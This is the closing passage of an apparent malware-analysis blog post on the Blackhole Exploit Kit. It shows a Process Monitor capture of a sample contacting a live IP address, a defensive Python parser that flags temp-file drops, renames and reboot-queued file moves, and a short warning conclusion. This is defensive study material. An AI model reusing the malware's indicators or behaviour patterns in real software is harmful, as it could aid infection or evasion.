| QueryNameInformationFile | C:\Windows\System32\npmproxy.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rasadhlp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\netprofm.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\FWPUCLNT.DLL | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rasapi32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\SensApi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rtutils.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rasman.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\nlaapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\WSHTCPIP.DLL | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ntmarta.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\winnsi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\IPHLPAPI.DLL | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\version.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rsaenh.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\dnsapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\wship6.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\mswsock.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\cryptsp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\sspicli.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\cryptbase.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\RpcRtRemote.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\profapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\msasn1.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\crypt32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\KernelBase.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ole32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\iertutil.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\msctf.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\Wldap32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ws2_32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\lpk.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\imagehlp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\nsi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\imm32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\user32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\advapi32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\kernel32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\msvcrt.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\urlmon.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\rpcrt4.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\usp10.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\shell32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\sechost.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\clbcatq.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\shlwapi.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\oleaut32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\wininet.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\ntdll.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\gdi32.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\apisetschema.dll | SUCCESS |
| Process Exit | SUCCESS | |
| CloseFile | C:\Users\alpha\Desktop\Malware | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Nls\Sorting\Versions | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegCloseKey | HKLM | SUCCESS |
| CloseFile | C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2 | SUCCESS |
| RegCloseKey | HKCU | SUCCESS |
| CloseFile | C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2 | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Policies | SUCCESS |
| RegCloseKey | HKCU\Software\Policies | SUCCESS |
| RegCloseKey | HKCU\Software | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Roaming\Microsoft\Windows\Cookies\index.dat | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9 | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\services\WinSock2\Parameters\NameSpace_Catalog5 | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Tracing\readme_RASAPI32 | SUCCESS |
| RegCloseKey | HKU | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Tracing\readme_RASMANCS | SUCCESS |
| RegCloseKey | HKCU | SUCCESS |
| RegCloseKey | HKCU\Software\Classes | SUCCESS |
| RegCloseKey | HKCU\Software\Classes | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | SUCCESS |
| CloseFile | C:\Windows\System32\en-US\urlmon.dll.mui | SUCCESS |
| TCP Disconnect | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
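A Process Monitor capture this long is easier to read once the rows are reduced to the handful of behaviours that matter: the remote endpoint, files written into the user's Temp directory, renames of the original sample, and the write to PendingFileRenameOperations (a file move queued for the next reboot). As an added example (not part of the original post), the Python below parses rows in the same markdown layout as the table above, using a trimmed selection of the page's own rows as constructed sample input, and pulls those findings out. The function names and the finding categories are my own.

```python
import re
from typing import Any, Dict, List

# Rows taken from the Process Monitor capture above (same markdown layout),
# trimmed to the handful that matter for triage; constructed sample input.
SAMPLE_PROCMON = r"""
| Operation | Path | Result |
|---|---|---|
| TCP Send | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
| TCP Receive | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
| CreateFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Temp | SUCCESS |
| SetRenameInformationFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| RegQueryValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations | NAME NOT FOUND |
| RegSetValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations | SUCCESS |
| TCP Disconnect | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
"""

Event = Dict[str, str]
NET_DST_RE = re.compile(r"->\s*(?P<dst>\S+)")          # "local -> remote" in TCP rows
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def parse_procmon_rows(text: str) -> List[Event]:
    """Parse '| op | path | result |' rows; skips the header and separator."""
    events: List[Event] = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3 or cells[0] in ("Operation", "---"):
            continue
        events.append({"op": cells[0], "path": cells[1], "result": cells[2]})
    return events


def triage(events: List[Event]) -> Dict[str, Any]:
    """Summarise the behaviours this capture exhibits: remote endpoints, files
    dropped under %TEMP%, renames of the sample, and a pending-rename registry
    write (a file move queued for the next reboot). Only successful operations count."""
    findings: Dict[str, Any] = {
        "remote_endpoints": [], "temp_drops": [], "renames": [], "reboot_rename_queued": False,
    }
    for ev in events:
        if ev["result"] != "SUCCESS":
            continue
        if ev["op"].startswith("TCP "):
            m = NET_DST_RE.search(ev["path"])
            if m and m.group("dst") not in findings["remote_endpoints"]:
                findings["remote_endpoints"].append(m.group("dst"))
        elif ev["op"] == "CreateFile" and TEMP_DIR_RE.search(ev["path"]):
            if ev["path"] not in findings["temp_drops"]:
                findings["temp_drops"].append(ev["path"])
        elif ev["op"] == "SetRenameInformationFile":
            findings["renames"].append(ev["path"])
        elif ev["op"] == "RegSetValue" and ev["path"].endswith("PendingFileRenameOperations"):
            findings["reboot_rename_queued"] = True
    return findings


if __name__ == "__main__":
    for key, value in triage(parse_procmon_rows(SAMPLE_PROCMON)).items():
        print(f"{key}: {value}")
```

Note that `CreateFile` on the Temp directory itself (a row the capture also contains) is not reported as a drop, only files beneath it are, and the failed `RegQueryValue` on PendingFileRenameOperations is ignored while the later successful `RegSetValue` is what raises the flag.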
Conclusion:
The Blackhole Exploit Kit is highly customizable and very dangerous. The compromise of web servers and the use of crimeware kits is an ongoing adventure for computer hackers, baddies, and organized crime participants. Until undertrained system administrators can securely protect their web servers and programmers can produce secure code, you will continue to see a rise in this type of activity.
Thank you!